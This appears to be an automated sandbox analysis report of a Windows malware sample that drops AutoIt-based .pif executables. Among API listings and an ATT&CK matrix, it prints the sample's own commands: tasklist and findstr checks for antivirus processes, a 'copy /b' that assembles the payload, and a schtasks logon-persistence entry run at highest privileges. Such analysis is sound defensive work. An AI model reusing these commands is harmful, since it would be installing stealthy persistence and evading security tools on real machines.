Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: file.exeStatic file information: File size 2418898 > 1048576
Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C1C4A1 LoadLibraryA,GetProcAddress,10_2_00C1C4A1
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BC8AA5 push ecx; ret 10_2_00BC8AB8
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006B8AA5 push ecx; ret 15_2_006B8AB8

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifFile created: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifFile created: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifJump to dropped file

Boot Survival

barindex
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "MindTechPro360" /tr "wscript //B 'C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js'" /sc onlogon /F /RL HIGHEST
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C2577B IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_00C2577B
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BB5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00BB5EDA
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_0071577B IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,15_2_0071577B
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006A5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,15_2_006A5EDA
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BC32E9 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_00BC32E9
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifAPI coverage: 4.8 %
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifAPI coverage: 4.7 %
Source: C:\Windows\SysWOW64\timeout.exe TID: 7720Thread sleep count: 130 > 30Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405C4E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040689A FindFirstFileW,FindClose,0_2_0040689A
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C047B7 GetFileAttributesW,FindFirstFileW,FindClose,10_2_00C047B7
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C03B4F FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00C03B4F
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C03E72 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00C03E72
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C0C16C FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_00C0C16C
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C0CB81 FindFirstFileW,FindClose,10_2_00C0CB81
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C0CC0C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_00C0CC0C
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C0F445 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00C0F445
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C0F5A2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00C0F5A2
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C0F8A3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_00C0F8A3
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006F47B7 GetFileAttributesW,FindFirstFileW,FindClose,15_2_006F47B7
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006F3E72 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_006F3E72
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006FC16C FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,15_2_006FC16C
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006FCB81 FindFirstFileW,FindClose,15_2_006FCB81
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006FCC0C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,15_2_006FCC0C
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006FF445 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_006FF445
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006FF5A2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_006FF5A2
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006FF8A3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,15_2_006FF8A3
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006F3B4F FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_006F3B4F
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BB5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00BB5D13
Source: Shopzilla.pif, 0000000A.00000002.2943481145.0000000003B16000.00000004.00000020.00020000.00000000.sdmp, MindTechPro360.pif, 0000000F.00000002.2943688312.0000000003BF3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-3569
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifAPI call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C143B9 BlockInput,10_2_00C143B9
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BB5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00BB5240
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BD5BDC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,10_2_00BD5BDC
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C1C4A1 LoadLibraryA,GetProcAddress,10_2_00C1C4A1
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BF86B0 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_00BF86B0
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BCA2B5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00BCA2B5
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BCA284 SetUnhandledExceptionFilter,10_2_00BCA284
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006BA2B5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_006BA2B5
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006BA284 SetUnhandledExceptionFilter,15_2_006BA284
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BF914C LogonUserW,10_2_00BF914C
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BB5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00BB5240
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C01932 SendInput,keybd_event,10_2_00C01932
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C050A7 mouse_event,10_2_00C050A7
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Anyone Anyone.cmd & Anyone.cmdJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 812297Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "IndieBeachesHonIo" Janet Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Praise + Bee + Random + Acoustic + Predict + Shannon + Extreme + Gnome + Sandra + Wright + Ready + Bb + Dot + Almost + Do + Continental 812297\gJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pif 812297\Shopzilla.pif 812297\gJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 15Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pif "C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pif" "C:\Users\user\AppData\Local\TechMind360 Innovations Co\L"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BF86B0 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_00BF86B0
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C04D89 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_00C04D89
Source: file.exe, 00000000.00000002.1901869005.000000000283D000.00000004.00000020.00020000.00000000.sdmp, Shopzilla.pif, 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmp, Shopzilla.pif, 0000000A.00000003.1746056007.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Shopzilla.pif, MindTechPro360.pifBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BC878B cpuid 10_2_00BC878B
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C0E0CA GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,10_2_00C0E0CA
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BE0652 GetUserNameW,10_2_00BE0652
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BD409A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,10_2_00BD409A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004035D8
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: MindTechPro360.pifBinary or memory string: WIN_81
Source: MindTechPro360.pifBinary or memory string: WIN_XP
Source: MindTechPro360.pifBinary or memory string: WIN_XPe
Source: MindTechPro360.pif.10.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyteP
Source: MindTechPro360.pifBinary or memory string: WIN_VISTA
Source: MindTechPro360.pifBinary or memory string: WIN_7
Source: MindTechPro360.pifBinary or memory string: WIN_8
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C16733 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,10_2_00C16733
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C16BF7 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_00C16BF7
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_00706733 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,15_2_00706733
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_00706BF7 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,15_2_00706BF7
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information11
Scripting
2
Valid Accounts
1
Windows Management Instrumentation
11
Scripting
1
Exploitation for Privilege Escalation
1
Disable or Modify Tools
21
Input Capture
2
System Time Discovery
Remote Services1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Native API
1
DLL Side-Loading
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Account Discovery
Remote Desktop Protocol21
Input Capture
1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Scheduled Task/Job
2
Valid Accounts
2
Valid Accounts
2
Obfuscated Files or Information
Security Account Manager2
File and Directory Discovery
SMB/Windows Admin Shares3
Clipboard Data
1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron1
Scheduled Task/Job
21
Access Token Manipulation
1
DLL Side-Loading
NTDS17
System Information Discovery
Distributed Component Object ModelInput Capture1
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection
11
Masquerading
LSA Secrets31
Security Software Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
Scheduled Task/Job
2
Valid Accounts
Cached Domain Credentials1
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Virtualization/Sandbox Evasion
DCSync4
Process Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
Access Token Manipulation
Proc Filesystem1
Application Window Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
Process Injection
/etc/passwd and /etc/shadow1
System Owner/User Discovery
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1458478 Sample: file.exe Startdate: 17/06/2024 Architecture: WINDOWS Score: 84 54 JzyWtlVaDZyw.JzyWtlVaDZyw 2->54 60 Sigma detected: Search for Antivirus process 2->60 62 Machine Learning detection for sample 2->62 64 Sigma detected: Suspicious Command Patterns In Scheduled Task Creation 2->64 66 3 other signatures 2->66 10 file.exe 85 2->10         started        14 wscript.exe 1 2->14         started        signatures3 process4 file5 46 C:\Users\user\AppData\Local\Temp\Wright, data 10->46 dropped 48 C:\Users\user\AppData\Local\Temp\Shannon, data 10->48 dropped 50 C:\Users\user\AppData\Local\Temp\Sandra, data 10->50 dropped 52 12 other malicious files 10->52 dropped 74 Writes many files with high entropy 10->74 16 cmd.exe 3 10->16         started        76 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->76 20 MindTechPro360.pif 14->20         started        signatures6 process7 file8 36 C:\Users\user\AppData\Local\...\Shopzilla.pif, PE32 16->36 dropped 56 Drops PE files with a suspicious file extension 16->56 58 Writes many files with high entropy 16->58 22 Shopzilla.pif 4 16->22         started        26 cmd.exe 2 16->26         started        28 conhost.exe 16->28         started        30 7 other processes 16->30 signatures9 process10 file11 38 C:\Users\user\AppData\...\MindTechPro360.pif, PE32 22->38 dropped 40 C:\Users\user\AppData\...\MindTechPro360.js, ASCII 22->40 dropped 42 C:\Users\user\AppData\Local\...\L, data 22->42 dropped 68 Drops PE files with a suspicious file extension 22->68 70 Uses schtasks.exe or at.exe to add and modify task schedules 22->70 72 Writes many files with high entropy 22->72 32 schtasks.exe 1 22->32         started        44 C:\Users\user\AppData\Local\Temp\812297\g, data 26->44 dropped signatures12 process13 process14 34 conhost.exe 32->34         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
file.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pif0%ReversingLabs
C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pif0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
http://www.autoitscript.com/autoit3/00%Avira URL Cloudsafe
http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
